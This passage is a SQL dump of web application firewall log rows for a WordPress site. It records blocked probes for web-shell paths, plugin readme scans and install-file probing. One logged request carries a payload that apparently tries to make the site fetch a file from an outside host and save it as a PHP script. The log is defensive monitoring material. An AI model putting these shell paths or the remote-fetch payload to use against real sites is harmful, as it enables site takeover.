'{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3NpbXBsZS5waHA=","category":"brute-force","ssl":1}'),
(50819, 1712000438.114861, 1712000437.592600, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üW', 0, 403, 0, 0, 0, 'https://www.happythinking.com/radio.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3JhZGlvLnBocA==","category":"brute-force","ssl":1}'),
(51915, 1712636825.201477, 1712636824.841900, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/cong.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2NvbmcucGhw","category":"brute-force","ssl":1}'),
(50550, 1711503726.965377, 1711503726.542500, '\0\0\0\0\0\0\0\0\0\0ÿÿ3‘.''', 0, 403, 0, 0, 0, 'https://happythinking.com/style.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3N0eWxlLnBocA==","category":"brute-force","ssl":1}'),
(50631, 1711731943.795739, 1711731943.421900, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹c>o', 0, 403, 0, 0, 0, 'https://www.happythinking.com///wp-admin/js/widgets/xmrlpc.php?p=', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Ly8vd3AtYWRtaW4vanMvd2lkZ2V0cy94bXJscGMucGhw","category":"brute-force","ssl":1}'),
(51726, 1712368240.339349, 1712368239.847300, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/page-flip-image-gallery/readme.txt', NULL, 'Mozilla/5.0 (Linux; Android 10; YAL-L21; HMSCore 6.13.0.302; GMSCore 24.02.13) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.88 HuaweiBrowser/14.0.2.311 Mobile Safari/537.3', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy9wYWdlLWZsaXAtaW1hZ2UtZ2FsbGVyeS9yZWFkbWUudHh0","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9wYWdlLWZsaXAtaW1hZ2UtZ2FsbGVyeS9yZWFkbWUudHh0","category":"discovery-and-probing","ssl":1}'),
(50709, 1711810288.359464, 1711810287.975800, '\0\0\0\0\0\0\0\0\0\0ÿÿT÷ÿ', 0, 403, 0, 0, 0, 'https://www.happythinking.com/wp-content/themes/wpclassic/inc/index.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvdGhlbWVzL3dwY2xhc3NpYy9pbmMvaW5kZXgucGhw","category":"brute-force","ssl":1}'),
(50632, 1711731942.169399, 1711731941.793000, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹c>o', 0, 403, 0, 0, 0, 'https://www.happythinking.com///images/xmrlpc.php?p=', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Ly8vaW1hZ2VzL3htcmxwYy5waHA=","category":"brute-force","ssl":1}'),
(50537, 1711400551.472335, 1711400550.778100, '\0\0\0\0\0\0\0\0\0\0ÿÿæ-Ã', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-content/plugins/yyobang/mar.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVpbGQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9iaWxlIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy95eW9iYW5nL21hci5waHA=","category":"brute-force","ssl":1}'),
(51703, 1712368016.087144, 1712368015.770100, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/wp-matrix-gallery/readme.txt', NULL, 'Mozilla/5.0 (iPad; CPU OS 14_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/122.0 Mobile/15E148 Safari/605.1.15', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC51cmk=","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1tYXRyaXgtZ2FsbGVyeS9yZWFkbWUudHh0","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1tYXRyaXgtZ2FsbGVyeS9yZWFkbWUudHh0","category":"discovery-and-probing","ssl":1}'),
(51829, 0.000000, 1712422386.046949, '\0\0\0\0\0\0\0\0\0\0ÿÿ,ëÓè', 0, 200, 0, 0, 0, 'https://www.happythinking.com/?_wfsf=detectProxy', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.82 Safari/537.1', 'scan:detectproxy', NULL, NULL),
(51821, 1712406478.080784, 1712406477.369200, '\0\0\0\0\0\0\0\0\0\0ÿÿ’¾`v', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-content/plugins/core-stab/RxRulxnn.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9jb3JlLXN0YWIvUnhSdWx4bm4ucGhw","category":"brute-force","ssl":1}'),
(51704, 1712368016.086900, 1712368015.770100, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/wp-matrix-gallery/readme.txt', NULL, 'Mozilla/5.0 (iPad; CPU OS 14_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/122.0 Mobile/15E148 Safari/605.1.15', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1tYXRyaXgtZ2FsbGVyeS9yZWFkbWUudHh0","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1tYXRyaXgtZ2FsbGVyeS9yZWFkbWUudHh0","category":"discovery-and-probing","ssl":1}'),
(51830, 0.000000, 1712423072.096290, '\0\0\0\0\0\0\0\0\0\0ÿÿÁÞ`', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51705, 1712368014.908394, 1712368014.543400, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/wp-flipslideshow/readme.txt', NULL, 'Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/115.0.5826.212 Chrome/115.0.5826.212 Safari/537.36', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC51cmk=","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1mbGlwc2xpZGVzaG93L3JlYWRtZS50eHQ=","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1mbGlwc2xpZGVzaG93L3JlYWRtZS50eHQ=","category":"discovery-and-probing","ssl":1}'),
(50630, 1711731945.204568, 1711731944.887400, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹c>o', 0, 403, 0, 0, 0, 'https://www.happythinking.com///wp-admin/css/colors/xmrlpc.php?p=', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Ly8vd3AtYWRtaW4vY3NzL2NvbG9ycy94bXJscGMucGhw","category":"brute-force","ssl":1}'),
(51706, 1712368014.908148, 1712368014.543400, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/wp-flipslideshow/readme.txt', NULL, 'Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/115.0.5826.212 Chrome/115.0.5826.212 Safari/537.36', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1mbGlwc2xpZGVzaG93L3JlYWRtZS50eHQ=","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1mbGlwc2xpZGVzaG93L3JlYWRtZS50eHQ=","category":"discovery-and-probing","ssl":1}'),
(51831, 0.000000, 1712425503.239523, '\0\0\0\0\0\0\0\0\0\0ÿÿÁÞ`', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51832, 1712426009.236779, 1712426008.901300, '\0\0\0\0\0\0\0\0\0\0ÿÿ’¾`v', 0, 403, 0, 0, 0, 'https://happythinking.com/oldsite/wp-admin/install.php', NULL, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 'blocked:waf', 'WordPress New Install File Probing', '{"learningMode":0,"failedRules":"506","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L29sZHNpdGUvd3AtYWRtaW4vaW5zdGFsbC5waHA=","path":"L29sZHNpdGUvd3AtYWRtaW4vaW5zdGFsbC5waHA=","category":"discovery-and-probing","ssl":1}'),
(51820, 1712406454.060443, 1712406453.526600, '\0\0\0\0\0\0\0\0\0\0ÿÿ’¾`v', 0, 403, 0, 0, 0, 'https://happythinking.com/rindex.php?parameter=RxRlstpe.php%7Chttp%3A%2F%2Fndot.us%2Fza&action=add', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3JpbmRleC5waHA=","category":"brute-force","ssl":1}'),
(51707, 1712368013.765177, 1712368013.438100, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/wp-dreamworkgallery/readme.txt', NULL, 'Mozilla/5.0 (X11; U; Linux i686; ja; rv:1.8.1.11) Gecko/20071128 Firefox/2.0.0.11 (Debian-2.0.0.11-1)', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC51cmk=","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1kcmVhbXdvcmtnYWxsZXJ5L3JlYWRtZS50eHQ=","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1kcmVhbXdvcmtnYWxsZXJ5L3JlYWRtZS50eHQ=","category":"discovery-and-probing","ssl":1}'),
(51708, 1712368013.764912, 1712368013.438100, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/wp-dreamworkgallery/readme.txt', NULL, 'Mozilla/5.0 (X11; U; Linux i686; ja; rv:1.8.1.11) Gecko/20071128 Firefox/2.0.0.11 (Debian-2.0.0.11-1)', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1kcmVhbXdvcmtnYWxsZXJ5L3JlYWRtZS50eHQ=","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1kcmVhbXdvcmtnYWxsZXJ5L3JlYWRtZS50eHQ=","category":"discovery-and-probing","ssl":1}'),
(51709, 1712368036.039142, 1712368035.676700, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/ecstatic/readme.txt', NULL, 'Mozilla/5.0 (Linux; Android 13; SAMSUNG SM-G781B) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/23.0 Chrome/115.0.0.0 Mobile Safari/537.3', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC51cmk=","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy9lY3N0YXRpYy9yZWFkbWUudHh0","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9lY3N0YXRpYy9yZWFkbWUudHh0","category":"discovery-and-probing","ssl":1}'),
(51819, 1712406456.179182, 1712406455.774100, '\0\0\0\0\0\0\0\0\0\0ÿÿ’¾`v', 0, 403, 0, 0, 0, 'https://happythinking.com/RxRlstpe.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L1J4UmxzdHBlLnBocA==","category":"brute-force","ssl":1}'),
(51710, 1712368036.024022, 1712368035.676700, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/ecstatic/readme.txt', NULL, 'Mozilla/5.0 (Linux; Android 13; SAMSUNG SM-G781B) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/23.0 Chrome/115.0.0.0 Mobile Safari/537.3', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy9lY3N0YXRpYy9yZWFkbWUudHh0","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9lY3N0YXRpYy9yZWFkbWUudHh0","category":"discovery-and-probing","ssl":1}'),
(51833, 1712426007.264987, 1712426006.976500, '\0\0\0\0\0\0\0\0\0\0ÿÿ’¾`v', 0, 403, 0, 0, 0, 'https://happythinking.com/site/wp-admin/install.php', NULL, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 'blocked:waf', 'WordPress New Install File Probing', '{"learningMode":0,"failedRules":"506","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3NpdGUvd3AtYWRtaW4vaW5zdGFsbC5waHA=","path":"L3NpdGUvd3AtYWRtaW4vaW5zdGFsbC5waHA=","category":"discovery-and-probing","ssl":1}'),
(51711, 1712368111.307612, 1712368110.950800, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/website-contact-form-with-file-upload/readme.txt', NULL, 'Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC51cmk=","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy93ZWJzaXRlLWNvbnRhY3QtZm9ybS13aXRoLWZpbGUtdXBsb2FkL3JlYWRtZS50eHQ=","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy93ZWJzaXRlLWNvbnRhY3QtZm9ybS13aXRoLWZpbGUtdXBsb2FkL3JlYWRtZS50eHQ=","category":"discovery-and-probing","ssl":1}'),
(51712, 1712368111.307369, 1712368110.950800, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/website-contact-form-with-file-upload/readme.txt', NULL, 'Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy93ZWJzaXRlLWNvbnRhY3QtZm9ybS13aXRoLWZpbGUtdXBsb2FkL3JlYWRtZS50eHQ=","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy93ZWJzaXRlLWNvbnRhY3QtZm9ybS13aXRoLWZpbGUtdXBsb2FkL3JlYWRtZS50eHQ=","category":"discovery-and-probing","ssl":1}'),
(51834, 1712426005.341348, 1712426005.061400, '\0\0\0\0\0\0\0\0\0\0ÿÿ’¾`v', 0, 403, 0, 0, 0, 'https://happythinking.com/backup/wp-admin/install.php', NULL, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 'blocked:waf', 'WordPress New Install File Probing', '{"learningMode":0,"failedRules":"506","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L2JhY2t1cC93cC1hZG1pbi9pbnN0YWxsLnBocA==","path":"L2JhY2t1cC93cC1hZG1pbi9pbnN0YWxsLnBocA==","category":"discovery-and-probing","ssl":1}'),
(52018, 1712689784.292808, 1712689783.856000, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üŽ', 0, 403, 0, 0, 0, 'https://happythinking.howequipmentworks.com/ws.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dzLnBocA==","category":"brute-force","ssl":1}'),
(52019, 1712689758.055358, 1712689757.758900, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üŽ', 0, 403, 0, 0, 0, 'https://happythinking.howequipmentworks.com/shell.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3NoZWxsLnBocA==","category":"brute-force","ssl":1}'),
(52044, 1712762023.801504, 1712762023.385700, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üW', 0, 403, 0, 0, 0, 'https://www.happythinking.com/wp-2019.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLTIwMTkucGhw","category":"brute-force","ssl":1}'),
(52021, 1712689715.540188, 1712689715.072100, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üŽ', 0, 403, 0, 0, 0, 'https://happythinking.howequipmentworks.com/ini.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2luaS5waHA=","category":"brute-force","ssl":1}'),
